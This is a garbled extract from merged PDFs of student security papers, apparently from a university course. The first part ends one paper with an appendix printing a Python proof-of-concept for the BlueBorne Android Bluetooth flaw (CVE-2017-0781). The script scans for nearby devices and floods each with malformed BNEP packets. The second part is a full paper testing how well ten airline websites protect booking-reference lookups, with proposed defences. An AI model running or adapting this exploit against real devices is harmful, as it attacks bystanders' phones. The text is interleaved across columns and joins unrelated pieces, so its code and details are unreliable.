[27] T. W. Wiki, “Capturesetup/bluetooth,” 2017. [Online].
Available:
https://wiki.wireshark.org/CaptureSetup/Bluetooth
[28] M. Ryan, “Crack and decrypt ble encryption,”
https://github.com/mikeryan/crackle, 2016.

gp11
PDFsam_merge 91
95
APPENDIX 34

A. PROTOTYPE CODE & HARDWARE 35 f o r addr i n n e a r b y d e v i c e s :


36 t a r g e t = addr
This following code written in Python for the Raspberry
37 l o g . i n f o ( ’ Attempting t o
Pi 3 based on the Blueborne exploit (CVE-2017-0781) for
i n j e c t CVE−2017 −0781... ’ )
Android devices. [2, 35]
38 l o g . i n f o ( ’ Connecting t o
{ } . . . ’ . format ( addr ) )
Note that this code does not contain the actual payload nor 39 sock = bluetooth .
it implements discovery for undiscoverable devices. It can be B l u e t o o t h S o c k e t ( b l u e t o o t h . L2CAP)
modified to target undiscoverable devices and injected with 40 bluetooth . set l2cap mtu (
an actual payload. However, this mandates the use of a ROP sock , 1 5 0 0 )
chain to run attacker-specified code and can be performed 41
by using ROPgadget, a tool which allows to search gadgets 42 try :
on binaries to facilitate ROP exploitations. 43 sock . connect ( (
target , port ) )
To use this script, a 64-bit Unix OS is required, along with 44 except :
the installation of Python 2.7 (packages: pybluz, pwntools) 45 l o g . i n f o ( ’ Unable t o
and bluez (packages: bluetooth, libbluetooth-dev, libffi-dev) c o n n e c t . . . c o n t i n u i n g attempt ’ )
in the RPi3. 46 break
47

48 l o g . i n f o ( ’ Sending BNEP
This setup also uses a widely available CSR (Cambridge
packets . . . ’ )
Silicon Radio) v4.0 Bluetooth dongle.
49 f o r i i n r a n g e ( count ) :
50 s o c k . send (
The code is as follows:
bad packet )
1 from pwn import ∗ 51
2 import b l u e t o o t h 52 log . success ( ’ Success ! ’ )
3
53 sock . c l o s e ( )
4 count = 30 # Amount o f p a c k e t s t o send
5
6 p o r t = 0 x f # BT PSM BNEP
7 c o n t e x t . a r c h = ’ arm ’
8 BNEP FRAME CONTROL = 0 x01
9 BNEP SETUP CONNECTION REQUEST MSG = 0 x01
10

11 def set bnep header extension bit (


bnep header type ) :
12 ”””
13 I f t h e e x t e n s i o n f l a g i s e q u a l t o 0 x1
then
14 one o r more e x t e n s i o n h e a d e r s f o l l o w s
t h e BNEP
15 header ; I f e x t e n s i o n f l a g i s equal to 0
x0 then t h e
16 BNEP pa y l oa d f o l l o w s t h e BNEP h e a d e r .
17 ”””
18 r e t u r n b n e p h e a d e r t y p e | 128
19

20 def bnep control packet ( control type ,


control packet ) :
21 r e t u r n p8 ( c o n t r o l t y p e ) +
control packet
22

23 def packet ( overflow ) :


24 pkt = ’ ’
25 pkt += p8 ( s e t b n e p h e a d e r e x t e n s i o n b i t
(BNEP FRAME CONTROL) )
26 pkt += b n e p c o n t r o l p a c k e t (
BNEP SETUP CONNECTION REQUEST MSG, ’ \
x00 ’ + o v e r f l o w )
27 r e t u r n pkt
28

29 b a d p a c k e t = p a c k e t ( ’AAAABBBB ’ )
30

31 while (1) :
32 nearby devices = bluetooth .
d i s c o v e r d e v i c e s ( lookup names=F a l s e )
33 l o g . i n f o ( ’ Found %d d e v i c e s ’ % l e n (
nearby devices ) )

gp11
PDFsam_merge 92
96
Evaluation of the Security of Airline Booking Systems
Lu Yuehan Matthieu Marie Emmanuel Buot Tan Xue Si
National University of Singapore De L'Epine National University of Singapore
13 Computing Drive National University of Singapore 13 Computing Drive
Singapore 117417 13 Computing Drive Singapore 117417
+65 6516 2727 Singapore 117417 +65 6516 2727
a0119387@u.nus.edu +65 6516 2727 xuesi.tan@u.nus.edu
e0216175@u.nus.edu
Tay Keming Justin Wong Kang Fei
National University of Singapore National University of Singapore
13 Computing Drive 13 Computing Drive
Singapore 117417 Singapore 117417
+65 6516 2727 +65 6516 2727
justintay@u.nus.edu kfwong@u.nus.edu

ABSTRACT
With the recent growth in demand in the aviation industry, people
1. INTRODUCTION
There has been an increasing trend in passenger growth in
are entrusting their personal data to airlines and attached to their
the aviation industry in recent years, with passenger demand
flight bookings in exchange for an uninterrupted flight experience.
forecasts to double in 20 years and a year on year growth of 7.4%
It is vital that these passenger data are kept private and
in both 2016 and 2017. [1] [2]
confidential, for only intended recipients to view. This paper
seeks to analyse how secure booking codes used by airlines are, This roughly translates to an increase in the number of people that
and the measures put in place by airlines on their websites on the can afford air travel and in the process of booking the tickets to
retrieval of booking records. The findings are presented with their next travel destination, have provided the airlines of their
proposed solutions, to allow for more secure systems to be built. choice with some of their personal data. These personal data
include and are not limited to information such as the passenger’s
Categories and Subject Descriptors name, email address, passport information and the payment
K.6.5 [Security and Protection]: Miscellaneous method used to pay for their tickets.
This increasing demand has also transformed into a force
General Terms accelerating changes in the aviation industry, to cope with the
Security increase in demand and more notably, ensure passengers with a
peace of mind while travelling. Most media coverage or noted
implementations to air travel safety have been on improvements in
Keywords general, such as facilitating airport security checks. [4] Other
Airlines, Aviation, Booking systems, GDS, Global Distribution improvements like flight upgrades stems from lessons learnt from
Systems, Amadeus, Sabre, Travelport past incidents in the industry, like the disappearance of flight
Malaysia Airlines flight 370 which has prompted upgrades to
flight tracking equipment. [5]
Yet, there has not been much coverage or noted improvements in
software or cybersecurity for the aviation industry, which is one of
the top priorities as well. [3] This is in view technical incidents,
such as the check-in systems, or cyber-attacks that have been
made on the industry. [6] [7]
One could argue that with technological advancements, the
software, and related cybersecurity measures put in place by
airlines needs to be constantly updated and tested to ensure the
integrity of their networks and protect consumer data. Yet, there is
not as much focus from news or other media outlets on the
improvements to such technical systems of airlines, despite the
numerous technical glitches that have been experienced. [9]

2. MOTIVATION
With the advent of big data and digital advertising, consumers’
personal data is now pegged with a price tag which is estimated to
be £3,241. [8] Considering this and the personal information that

gp12
PDFsam_merge 93
97
consumers are passing on to airlines, it is important for these data maintain the fares and availability of tickets from airlines and
to be kept private and secure to a certain extent. reservations created by passengers.
Moreover, the earliest airline booking systems go all the way back There are three main GDS players in the global market currently:
to the 1960s, which is utilized by most, if not all, airlines in
generating booking references. [10] Thus, these systems may not 3.2.1 Amadeus
provide sufficient security by modern standards to safely protect Amadeus was founded by a group of airlines in 1987, namely Air
consumer data. France, Iberia, Lufthansa and Scandinavian Airlines. It is the
second main player in the GDS market, with 19.7% of the market
This paper aims to explore and test the security that airlines have share. [12] It has since grown and acquired Navitaire back in
in place for the retrieval of bookings using booking reference 2016, another GDS system which was mainly used by budget
codes generated for each booking that a passenger makes. carriers. [13]

3. AIRLINE BOOKING 3.2.2 Sabre


Each booking made by a potential traveller follows a typical Sabre was the first GDS to be created, developed in 1960 through
process as highlighted in Figure 1 below, until they retrieve a a collaboration between American Airlines and IBM to handle
booking reference that is generated for his or her booking: electronic reservations. [10] It has approximately 36.3% of the
global market share with its main clientele in the USA. [12]

3.2.3 Travelport
Travelport is the youngest of the main GDS players, due to the
later founding and the acquisition of other smaller rival GDS
systems such as Galileo and Worldspan. It currently owns
approximately 20% of the market share. [12]

3.3 Travel Providers


Travel providers are organizations utilizing the Global
Distribution Systems (GDS) to store data on some sort of service
that they offer, and in our case, airlines that provide different
fares, seats and availability.

3.4 Passenger Name Records (PNR)


Passenger name records (PNR) are generated by the booking
systems for each travel that a passenger book. These PNRs are
built using the data provided by the passenger, airline or travel
agent when booking his or her travel tickets.
The data encapsulated by a PNR includes details such as the
passenger’s name, address, contact number and other travel
information. [14] (See Figure 2)

Figure 1 Ticket booking process

3.1 Booking Systems


Booking systems refer to either travel agents, such as Expedia, or
the direct airline with websites to book travel tickets. These
booking systems interact with the GDS to check fare availability
by the different travel providers and create or updates reservations
as necessary.

3.2 Global Distribution Systems (GDS) Figure 2 Example of a PNR


Global Distribution Systems (GDS) were first created in the
1960s, as a means of controlling and overseeing the availability These PNRs may include information from different travel
and prices of flights, as well as the flight schedules. [11] Now, providers, such as a car hire included under a travel ticket and
these systems store data from both airlines and passengers, as they some sensitive information such as credit card numbers. As such,

gp12
PDFsam_merge 94
98
it is important to limit the access to these PNRs and provide
sufficient security measures to protect the information contained.

3.5 Booking Reference


A booking reference code, or PNR locator code is generated for
each booking that is made. These are typically 6 character
alphanumeric codes, which is all in uppercase, thus providing a
code space of 366 or 2,176,782,336 different combinations.
While there may be slight variations between the different GDS,
the code space is alarming and is susceptible to brute force
attacks.

4. ISSUES
Most airlines these days provide a form for managing bookings,
and while different airlines may have slight differences in the
information required to retrieve a booking, most can still be
retrieved using only the PNR locator or booking reference,
coupled with the passenger’s last name for that booking.
This authentication measure is similar to a password-based
authentication system, except that these ‘passwords’ cannot be
changed by the user and are shared between different parties, such
as the airline, travel agents and GDS staff. This forms a very weak
authentication measure by modern standards.
Besides the susceptibility of brute forcing the PNR locator with an
associated last name, the PNR can be gathered both online or
offline, through various means such as searching through social
media, or capturing baggage tags in the airports.

Figure 4 PNR on physical baggage tags

Given the information captured in a PNR, the issue is worsened


by the following factors:

4.1 Information Loss


As anyone who can access the PNR is able to retrieve the
Figure 3 PNR on boarding pass uploaded on social media information associated with it, the original holder of the PNR
might face multiple threats, such as being stalked, credit card
fraud or even identity theft.

4.2 Flight Theft


Being able to access the manage booking functionality using the
PNR locator and/or some other fields, malicious attackers may be
able to accomplish various tasks. The functionalities available
may differ between airlines, but typically includes tasks such as:
[15] [16]
1. Changing of flight details such as date or seats
2. Refunding of ticket or transferring passenger name
3. Collect flyer miles instead of original passenger
A malicious attacker may then be able to “convert” the ticket and
allow him/herself to fly for free, leaving the original passenger
stranded without a flight despite having legitimately paying for it.

4.3 Social Engineering


Malicious attackers may be able to utilize various information
gained from accessing the PNR to conduct social engineering
attacks. For instance, spear-phishing may also be used, where a

gp12
PDFsam_merge 95
99
malicious attacker may create and send phishing emails to its 4. Ability to check on bookings made with other airlines
identified target from the PNR to trick its unknowing victim into
Being able to check on bookings made with other airlines poses
disclosing other confidential information.
an additional vulnerability or loophole for attackers to utilize, as
they can bypass additional safeguards set in place by other sites
5. TESTING and use one with lower security standards to conduct their
In view of the issues present, it is important to ensure that attacks.
booking retrieval systems are sufficiently secure to minimize the
probability of occurrence of such incidents highlighted
previously.
We first identify the issues that may be present in the booking
retrieval systems on current airline websites, before proposing
solutions that may help to mitigate against unwanted attacks.
For our testing purposes, we have scoped the airlines to those that
are more relevant in the context of Singapore, limiting ourselves
to a total of 10 different airlines. Our basic analysis comprises of
30 valid and 30 invalid requests to trigger the system. Valid
requests were done using our relatives and/or friends’ valid
bookings (with permission), while invalid requests were randomly
generated values meant to trigger the different measures these
sites have in place.
The testing framework involves two types of tests, visual and non-
visual tests. The results are presented in a tabular format in their
Figure 7 Example of checking booking on another airline
respective subsections.

5.1 Visual Testing 5. Site is HTTPS enabled


Under the visual testing aspects, we have identified 5 different
factors which can be easily identified while using the websites, HTTPS should be enabled by default, to protect a user’s privacy
namely: and data integrity against intruders that exploit unprotected
resources.
1. Captchas
The presence of captchas serves to hinder brute force attempts
on the site, by requesting the user to solve a puzzle after Table 1 Visual testing results
multiple requests or if the request is deemed to be suspicious. Airline Captcha IP Error Ability HTTPS
Bans message to check enabled
leaks on other
2. IP Bans info airline
IP bans can be used as a supplementary measure to deter brute bookings
force attacks and hinder potential attackers, by banning the IP AirAsia ✕ ✕ ✕ ✕ ✓
used when multiple invalid requests above a certain threshold is
served. Cathay ✕ ✕ ✓ ✕ ✓
Pacific

3. Leakage of information from error messages


JetStar ✕ ✕ ✓ ✓ ✓

Leaking information through error messages may provide


Korean ✕ ✕ ✕ ✕ ✓
Air
additional insights to a potential attacker, such as the inner
workings of the system or confirming part of the input from the Malaysia ✕ ✕ ✓ ✓ ✓
attacker. Airlines
Qantas ✕ ✕ ✓ ✓ ✓
Scoot ✕ ✕ ✕ ✕ ✓
Figure 5 Example of error message leaking information
SilkAir ✕ ✕ ✕ ✕ ✓
In this example, we can see that the error message enabled us to
gain an insight that the PNR we requested was valid, except that Singapore ✕ ✕ ✕ ✕ ✓
the passenger name does not match. Airlines
Thai ✕ ✕ ✕ ✕ ✓
Airways
Figure 6 Example of normal error message

gp12
PDFsam_merge 100
96
From our visual testing results, we can see that most airline sites Table 2 Non-visual testing results
have similar defence mechanisms, aside from JetStar, Malaysia
Airline Thrott- Loading Code Local SQL
Airlines and Qantas having weaker defences. However, a notable
ling times on obfus- input Inject-
factor would be the lack of captchas and IP bans on these sites
valid vs. cation tests ion
despite multiple requests that would be more than necessary to
invalid
deem them as suspicious.
inputs
5.2 Non-Visual Testing AirAsia ✕ - ✕ ✕ ✕
For the non-visual testing, it relates to underlying processes and Cathay ✕ 400ms ✓ ✕ ✕
additional functional attributes, which may require additional Pacific
inputs, such as checking on the vulnerability to SQL injection,
rate throttling and code obfuscation. JetStar ✕ 200ms ✓ ✕ ✕

1. Rate throttling Korean ✕ - ✓ ✕ ✕


Air
✕ ✕ ✕ ✕
The use of rate throttling limits the number of requests served
Malaysia 2000ms
by a certain IP address, and may help to mitigate excess load
Airlines
caused by malicious attackers.
Qantas ✕ 2000ms ✓ ✕ ✕
2. Loading times on valid vs. invalid inputs Scoot ✕ - ✕ ✕ ✕
The difference in loading time between valid and invalid inputs SilkAir ✕ - ✓ ✕ ✕
✕ ✓ ✕ ✕
may provide an insight into the inner workings of the system, Singapore -
such as additional work being processed on the backend, which Airlines
may in turn be used by malicious attackers to conduct a denial-
of-service attacks. Thai ✕ - ✕ ✕ ✕
Airways

3. Code obfuscation
From the non-visual test results, a direct relation can be drawn
Code obfuscation relates to altering of function and variable
from the weaker sites identified in the visual test section. From the
names in code on the web pages, such as renaming all
combined results, we can classify these sites into different groups
JavaScript functions. However, this does not include the
depending on their overall defence mechanisms, which are
minifying of code.
provided below:
Rank Airlines
4. Local input testing
High AirAsia, Korean Air, SilkAir, Singapore
Local input testing refers to the transference of hashed data from
Airlines
the remote server for local processing to reduce bandwidth
consumption. For instance, when a valid booking reference but Medium Cathay Pacific, Scoot, Thai Airways
incorrect last name is requested and the server provides a
hashed version of the other inputs to be verified against locally. Low JetStar, Malaysia Airlines, Qantas

5. SQL injection
SQL injection vulnerability of the website, which may enable
6. SOLUTIONS
After analysing the various sites, we would like to propose the
additional data to be stolen by a malicious attacker if such
following implementations as a means of complementing the
vulnerability is present. This is an assumption to test if any of
current security measures to better protect a booking retrieval
the commands are executed against a SQL database on the
system.
backend.

6.1 Visual Aspects


6.1.1 Captchas
Despite 30 different attempts on the different sites, we did not
encounter any captcha requests. Even though it could be argued
that the captchas may be triggered only on higher attempt counts,
such as after 1000 invalid requests, it would be rendered useless if
the attacker bombards the site using multiple device instances. It
is also impractical to allow a huge number of invalid requests as a
typical user would not be trying that many different combinations.
We feel that a probable threshold for the captcha trigger should be
about after 10 invalid requests.

gp12
PDFsam_merge 101
97
6.1.2 Valid and invalid information loading time 7. CONCLUSION
One of the reasons that airlines might opt to check the invalidity With the results from the testing on various airline sites, it is
of the codes before accessing their database would be to reduce evident that the current defences and measures in place are mainly
load on the database. However, this can leak some information to build upon and protect the weak key strength provided by the
about the invalidity to the user. One simple solution that we came PNR.
up with is to simply store 5 of the latest database access times -
the amount of time it took to retrieve the data - on a file in the These different measures are unable to provide sufficient
web server. This reduces load, as well as giving the illusion that safeguards against attacks on the booking retrieval system, due to
the database was also accessed given an invalid code, thereby varying flaws. Moreover, the different variations of
normalizing the load times and prevents attackers from gaining implementations to the interfaces of these booking retrieval
any insights. systems may leave multiple vulnerabilities to be exploited, as the
fixes on one interface may not be applied onto another, thus
6.1.3 IP Bans leaving the unpatched interface still exploitable.
On top of using captchas, these airlines sites could also implement The main underlying issue relates back to the PNR system, and its
IP or MAC address banning depending on the request load a weak key strength. While additional defences can be developed
suspicious user puts on the server. These bans could be and implemented to patch existing vulnerabilities or reinforce
incremental as well, such as a temporal ban of 5 minutes, 30 security, it would reach a breaking point in which the number of
minutes to a day and then permanent bans if the user does not patches would saturate and it would not be cost beneficial to
relent on the server. This would be rendered useless when continue building upon the system.
multiple IP addresses are used, in which other measures would
have to be implemented in conjunction to counter the attacks, if This drives the proposal for modifying or replacing the system to
any. match modern standards in terms of security requirements.
Although costs of replacing the system would be exorbitant, it
6.1.4 Limit Access would be beneficial to replace the system at an earlier stage,
Limiting the access of a user is another measure to be considered. compared to a later stage whereby costs may be influenced by
This would be in the form of limiting the scope of the reference additional factors, such as the data.
checks, and to prevent cross airline checks if the travel details do
not contain the current airline. Moreover, additional mechanisms
may be implemented for other actions when managing a booking,
8. REFERENCES
[1] Anon. 2016. IATA Forecasts Passenger Demand to Double
such as for the refund or altering of flight details.
Over 20 Years. (October 2016). Retrieved November 1, 2017
from http://www.iata.org/pressroom/pr/Pages/2016-10-18-
6.2 Non-Visual Aspects 02.aspx
6.2.1 Preventing SQL Injection
One of the easiest ways is to use prepared statements, which are
the libraries provided by the database and languages. This works [2] Anon. 2017. Growth of global air traffic passenger demand
because the values are transmitted separately using a different 2017 | Statistic. (2017). Retrieved November 1, 2017 from
protocol and therefore need not be sanitised. https://www.statista.com/statistics/193533/growth-of-global-
air-traffic-passenger-demand/
6.2.2 Increasing Brute-force Difficulty
Currently, most airlines make use of a 6-alphanumeric capital-
[3] Gloria Gerstein. 2016. Exploring cybersecurity risks within
only reference number. Airlines mostly retain this system due to
the airline industry. (June 2016).
ease of use for their customers. With a size of 36, this results in
366 = 2,176,782,336 different combinations. With usability in
mind, we can make some minor changes, such as include lower- [4] Chabeli Herrera. 2017. Traveling for the holidays? Your trip
case alphabets - this increases the combinations to (26+36)6 = through Miami airport security could be faster than before.
56,800,235,584. To increase it even further, we can increase the (October 2017). Retrieved October 25, 2017 from
length to 8 - 628 = 218,340,105,584,896; this is a huge increase in http://www.miamiherald.com/news/business/article18068801
the combinations. 1.html
6.2.3 Preventing Multiple Tries
The airlines we tested don’t have any measures to mitigate [5] David Noland and Barbara Peterson. 2017. 12 Plane Crashes
multiple requests from a single internet user. Again, we That Changed Aviation. (November 2017). Retrieved
understand that this is for the customers’ ease-of-use. However, November 7, 2017 from
we can foresee that an attacker can DDoS the database just by http://www.popularmechanics.com/flight/g73/12-airplane-
sending multiple retrievals. This can be easily prevented by crashes-that-changed-aviation/
setting a delay on the IP/MAC address proportional to the times
accessed, e.g. Delay = (2 seconds) (number of accesses). Another method
is just preventing any more tries after a certain threshold, e.g. 30
tries.

gp12
PDFsam_merge 102
98
[6] Anon. 2017. World airport system crash sparks chaos.
(September 2017). Retrieved November 1, 2017 from [11] Richard L. Johnson. 2002. Global Distribution Systems in
http://www.news.com.au/travel/travel- Present Times . (October 2002). Retrieved November 2,
updates/incidents/international-airports-hit-by-computer- 2017 from http://www.hotel-
system-crash/news- online.com/News/PR2002_4th/Oct02_GDS.html
story/3c82e6e312223ee279c9256725fc5a9a

[12] Anon. 2017. GDS market shares and more. (May 2017).
[7] Jorge Valero. 2016. Hackers bombard aviation sector with Retrieved November 2, 2017 from
over 1,000 attacks per month. (July 2016). Retrieved https://www.businesstravel-iq.com/article/2017/05/11/gds-
November 2, 2017 from market-shares-and-more
https://www.euractiv.com/section/justice-home-
affairs/news/hackers-bombard-aviation-sector-with-more-
than-1000-attacks-per-month/ [13] Anon. 2016. Amadeus completes acquisition of Navitaire.
Amadeus (January 2016).
[8] Sophie Curtis. 2015. How much is your personal data worth?
(November 2015). Retrieved November 2, 2017 from [14] ICAO. 2010. Guidelines on passenger name record (PNR)
http://www.telegraph.co.uk/technology/news/12012191/How data, Montréal, Quebec: International Civil Aviation
-much-is-your-personal-data-worth.html Organization.

[9] David Yanofsky. 2015. There has been another airline glitch. [15] Anon. Manage booking. Retrieved November 3, 2017 from
(October 2015). Retrieved November 2, 2017 from https://www.qantas.com/sg/en/manage-booking.html
https://qz.com/535967/tech-glitches-keep-plaguing-us-
airlines-this-dashboard-keeps-track-of-them-all/
[16] Anon. About manage booking. Retrieved November 3, 2017
from https://www.cathaypacific.com/cx/en_SG/manage-
[10] Mark Warner, Donna Quadri Felitti, and Priya V. booking/manage-booking/about-manage-booking.html
Chandnani. 2010. A History of Travel Distributi on: 1915 -
2009, HEDNA.

gp12
PDFsam_merge 103
99
PDFsam_merge 104

You might also like